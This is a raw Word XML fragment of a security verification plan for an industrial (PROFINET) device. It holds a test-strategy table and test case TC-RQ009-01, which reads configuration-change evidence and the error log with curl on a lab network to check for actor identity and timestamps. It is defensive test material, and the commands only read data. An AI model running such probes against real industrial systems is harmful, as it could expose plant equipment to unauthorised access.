              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="007E50D2">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">settles G-3 </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2097" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4F2F040D" w14:textId="0B5D1CA4" w:rsidR="00900880" w:rsidRPr="007E1F53" w:rsidRDefault="00336E8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1F53">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>NIST SP 800-115 §3.2 + §7</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2E7B6BFA" w14:textId="77777777" w:rsidR="00336E8E" w:rsidRPr="007E1F53" w:rsidRDefault="00336E8E" w:rsidP="00336E8E">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4FEA1B34" w14:textId="3F9C9F81" w:rsidR="00A92572" w:rsidRPr="007E1F53"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1F53">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>SVV-2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00900880" w:rsidRPr="00D0764E" w14:paraId="06A3D54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E3D16A" w14:textId="77777777" w:rsidR="00900880" w:rsidRDefault="00900880" w:rsidP="005C021F">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
            </w:pPr>
            <w:r>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3969" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1268EBEC" w14:textId="36B2B7F1" w:rsidR="00B2493F" w:rsidRPr="00B2493F"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2493F">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Actor-delegation analysis: </w:t>
            </w:r>
            <w:r w:rsidR="007E50D2" w:rsidRPr="00B2493F">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>authorized</w:t>
            </w:r>
            <w:r w:rsidRPr="00B2493F">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> config change; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5C38A191" w14:textId="77777777" w:rsidR="00B2493F" w:rsidRPr="00B2493F"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2493F">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">confirm the device holds no actor identity; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0AE5AA8D" w14:textId="5E2F6B6A" w:rsidR="00900880" w:rsidRPr="00B2493F"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2493F">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>attribution exists only in the PLC/engineering project</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="27CC8AF0" w14:textId="6E328FAD" w:rsidR="00900880" w:rsidRPr="00B2493F" w:rsidRDefault="00EE366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2493F">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">Proves G-1 </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2097" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6CFAD700" w14:textId="24BECD2C" w:rsidR="00900880" w:rsidRPr="00B2493F" w:rsidRDefault="003A0D3F" w:rsidP="005C021F">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B2493F">
              <w:rPr>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
              <w:t xml:space="preserve">NIST SP 800-115 §3.1/§3.2 </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="958" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6E171595" w14:textId="2FD64B7D" w:rsidR="00900880" w:rsidRPr="00B2493F"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2493F">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>SVV-3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00900880" w:rsidRPr="00035F89" w14:paraId="2A4F783D"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63946FA" w14:textId="77777777" w:rsidR="00900880" w:rsidRDefault="00900880" w:rsidP="005C021F">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
            </w:pPr>
            <w:r>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3969" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6F2F1D04" w14:textId="77777777" w:rsidR="0035412A" w:rsidRPr="0035412A" w:rsidRDefault="002E14C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5412A">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Post-param-end write-gate: attempt an acyclic config write after param-end; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6E64C447" w14:textId="2BC63D6C" w:rsidR="00900880" w:rsidRPr="006643DB" w:rsidRDefault="002E14CC"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5412A">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>confirm rejection and absence of an evidence entry</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="29BDA998" w14:textId="77777777" w:rsidR="0035412A" w:rsidRPr="00F80BCC" w:rsidRDefault="00A22A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80BCC">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Validates temporal write-gate; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2ACAC15E" w14:textId="7D7918E9" w:rsidR="00900880" w:rsidRPr="006643DB" w:rsidRDefault="00A22A66"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80BCC">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>no-evidence-on-block</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2097" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4E1E8F00" w14:textId="77777777" w:rsidR="00F80BCC" w:rsidRPr="00010FF9"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010FF9">
              <w:t xml:space="preserve">OWASP ISTG-DES; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4A1DCEC2" w14:textId="43CA9763" w:rsidR="00900880" w:rsidRPr="00010FF9"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010FF9">
              <w:t>NIST SP 800-115 §5.2</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3F690A71" w14:textId="77777777" w:rsidR="00A92572" w:rsidRPr="00010FF9" w:rsidRDefault="00A92572" w:rsidP="00A92572">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="958" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3BC25BFB" w14:textId="1EF68711" w:rsidR="00900880" w:rsidRPr="00010FF9"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10FF9">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>SVV-3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D47A9" w:rsidRPr="003D799D" w14:paraId="23FB475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9EC5B12" w14:textId="4CC04510" w:rsidR="002D47A9" w:rsidRDefault="003D799D" w:rsidP="005C021F">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
            </w:pPr>
            <w:r>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3969" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3B6E8965" w14:textId="6FBC6DCE" w:rsidR="002D47A9" w:rsidRPr="0035412A" w:rsidRDefault="003D799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D799D">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Analytical: bound the REVISION_COUNTER 16-bit wrap over the 20-year mission with a documented re-parameterisation rate; argue evidence is bounded</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1A99C8F3" w14:textId="3CED5DDA" w:rsidR="002D47A9" w:rsidRPr="00F80BCC" w:rsidRDefault="00B06EA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06EAA">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Substantiates G-4 (non-lab-testable, per SM-5 rationale)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2097" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="18BEE347" w14:textId="37E42357" w:rsidR="002D47A9" w:rsidRPr="003D799D" w:rsidRDefault="008C3DB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C3DB5">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Requirements/lifecycle analysis (SRIO-706 mission time)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="958" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6E21DBD4" w14:textId="00E5F7F1" w:rsidR="002D47A9" w:rsidRPr="00010FF9" w:rsidRDefault="008D071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SVV-1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3E51B420" w14:textId="77777777" w:rsidR="009C0A46" w:rsidRDefault="009C0A46" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F780D5C" w14:textId="77777777" w:rsidR="009C0A46" w:rsidRDefault="009C0A46" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:commentRangeStart w:id="13"/>
      <w:r w:rsidRPr="00DB074F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 3 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidRPr="00DB074F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Two-Level Test Catalog</w:t>
      </w:r>
      <w:commentRangeEnd w:id="13"/>
      <w:r w:rsidR="007C59FA">
        <w:rPr>
          <w:rStyle w:val="Kommentarzeichen"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:commentReference w:id="13"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D566CCC" w14:textId="77777777" w:rsidR="009712CC" w:rsidRDefault="009712CC" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F9630E5" w14:textId="48489673" w:rsidR="009712CC" w:rsidRPr="003D799D" w:rsidRDefault="009712CC" w:rsidP="009712CC">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D799D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>TC-RQ009-01 - Config-Modification Evidence Surface Baseline</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EC5E903" w14:textId="77777777" w:rsidR="00A92572" w:rsidRPr="00DB074F" w:rsidRDefault="00A92572" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B9ABF82"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77DD91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B1C6C0" w14:textId="77777777" w:rsidR="00B73A1A" w:rsidRDefault="00B73A1A" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Field</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="11229C94"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5BDBF9B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2CCD70" w14:textId="77777777" w:rsidR="00B73A1A" w:rsidRDefault="00B73A1A" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Test Case ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="73D20A24" w14:textId="56EF3253" w:rsidR="00B73A1A" w:rsidRPr="006643DB" w:rsidRDefault="00CF057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F0570">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>TC-RQ009-01</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B73A1A" w:rsidRPr="00EE7A74" w14:paraId="6F19BF1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107DE63"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45EB4DF0" w14:textId="25FEFDBA" w:rsidR="00B73A1A" w:rsidRPr="006868A2" w:rsidRDefault="005137E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868A2">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>RQ-009 (EHSR 1.1.9 §2) → CR 2.8 / CR 3.4 / CR 6.1 → Asset B, Asset I</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B73A1A" w:rsidRPr="00D67CA6" w14:paraId="1DC2E82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C49319" w14:textId="77777777" w:rsidR="00B73A1A" w:rsidRDefault="00B73A1A" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Target Threat</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="154BF356" w14:textId="26A2C65A" w:rsidR="00B73A1A" w:rsidRPr="006643DB" w:rsidRDefault="005137E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Repudiation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B73A1A" w14:paraId="514ADC6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9503B8A" w14:textId="77777777" w:rsidR="00B73A1A" w:rsidRDefault="00B73A1A" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>SVV Category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7608F924" w14:textId="1455493F" w:rsidR="00B73A1A" w:rsidRPr="006643DB" w:rsidRDefault="005137E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SVV-1 (Requirement-based Testind)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B73A1A" w:rsidRPr="00EE7A74" w14:paraId="7B22EE9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F54A48" w14:textId="77777777" w:rsidR="00B73A1A" w:rsidRDefault="00B73A1A" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Objective</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="402F8C37" w14:textId="22CD0CE8" w:rsidR="00B73A1A" w:rsidRPr="006643DB" w:rsidRDefault="005C230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C2309">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Establish which configuration-modification evidence mechanisms exist and are readable: REVISION_COUNTER (I&amp;M0), iParCRC/I&amp;M4 signature, and the Error Log; inspect each for actor identity and absolute timestamp.(Firmware-modification evidence → RQ-008.)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B73A1A" w:rsidRPr="00EE7A74" w14:paraId="7390208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6275A04" w14:textId="77777777" w:rsidR="00B73A1A" w:rsidRDefault="00B73A1A" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Steps</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2C7F6B22" w14:textId="77777777" w:rsidR="003A2E99" w:rsidRDefault="003A2E99" w:rsidP="00655E93">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en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003A2E99">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">1. Read Error Log, I&amp;M0 REVISION_COUNTER, and I&amp;M4 at a known baseline. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2EB51269" w14:textId="6A49CE62" w:rsidR="00B73A1A" w:rsidRPr="003A2E99" w:rsidRDefault="003A2E99" w:rsidP="00655E93">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en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003A2E99">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>2. Record which fields carry identity/timestamp.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B73A1A" w:rsidRPr="00EE7A74" w14:paraId="74C7CCE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3BF74F" w14:textId="77777777" w:rsidR="00B73A1A" w:rsidRDefault="00B73A1A" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Pass/Fail</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="468B9B0B" w14:textId="02399EAA" w:rsidR="00B73A1A" w:rsidRPr="006643DB" w:rsidRDefault="005D7F11"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5D7F11">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>PASS (partial baseline) iff config-modification indicators are readable (CR 6.1 met). Documented shortfall where no field carries actor identity or absolute timestamp (feeds CR 2.11/2.12).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="300BFCC7" w14:textId="77777777" w:rsidR="00B73A1A" w:rsidRPr="00AF57B2" w:rsidRDefault="00B73A1A" w:rsidP="00B73A1A">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="56ED2FBD"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474CCD8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4D5082" w14:textId="77777777" w:rsidR="00B73A1A" w:rsidRDefault="00B73A1A" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Field</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="051665D2"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4F2F12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769720" w14:textId="77777777" w:rsidR="00B73A1A" w:rsidRDefault="00B73A1A" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Ref. Test Case</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="28909EF6" w14:textId="40854901" w:rsidR="00B73A1A" w:rsidRPr="006643DB" w:rsidRDefault="00B20B5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20B5F">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>TC-RQ009-01</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B73A1A" w:rsidRPr="00F15AEA" w14:paraId="5E13780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DC9ECE" w14:textId="77777777" w:rsidR="00B73A1A" w:rsidRDefault="00B73A1A" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>HW/Network</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="39C53873" w14:textId="6A80A81C" w:rsidR="00B73A1A" w:rsidRPr="006643DB" w:rsidRDefault="0099509F"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9509F">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>DUT 192.168.0.2; Pi mgmt eth1 = 192.168.50.10; browser 192.168.50.20</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B73A1A" w:rsidRPr="00EE7A74" w14:paraId="65DB5BD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F0A618" w14:textId="77777777" w:rsidR="00B73A1A" w:rsidRDefault="00B73A1A" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Tools</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4A20C2BB" w14:textId="68188B6A" w:rsidR="00B73A1A" w:rsidRPr="006643DB" w:rsidRDefault="007F7F2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F7F2C">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>curl / Visualizer; PN acyclic read for I&amp;M0 REVISION_COUNTER + I&amp;M4</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B73A1A" w:rsidRPr="00EE7A74" w14:paraId="54237225"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B604EFB" w14:textId="77777777" w:rsidR="00B73A1A" w:rsidRDefault="00B73A1A" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Procedure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="774688CC" w14:textId="77777777" w:rsidR="00960B9E" w:rsidRPr="00960B9E" w:rsidRDefault="00960B9E" w:rsidP="00960B9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60B9E">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t># TC-RQ009-01 Config-modification evidence surface baseline (firmware evidence -&gt; RQ-008)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="67FAE3D5" w14:textId="77777777" w:rsidR="00960B9E" w:rsidRPr="00960B9E" w:rsidRDefault="00960B9E" w:rsidP="00960B9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60B9E">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>curl -s http://192.168.0.2/devicestatus/errorlog/loglist -o TC0901_log_base.json</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="28C2CC46" w14:textId="1F03479C" w:rsidR="00B73A1A" w:rsidRPr="006643DB" w:rsidRDefault="00960B9E" w:rsidP="00960B9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60B9E">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t># I&amp;M0 REVISION_COUNTER + I&amp;M4 (F_iParCRC+F_Par_CRC) via acyclic PN read -&gt; TC0901_iandm_base.txt</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B73A1A" w:rsidRPr="00AD4B09" w14:paraId="4E7221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5F4E50" w14:textId="77777777" w:rsidR="00B73A1A" w:rsidRDefault="00B73A1A" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Result</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="474C1FF0" w14:textId="210B5379" w:rsidR="00B73A1A" w:rsidRPr="006643DB" w:rsidRDefault="00960B9E"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Pr>
                <w:i/>
                <w:iCs/>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Config indicators readable/ No identity/tinestamp present</w:t>
            </w:r>
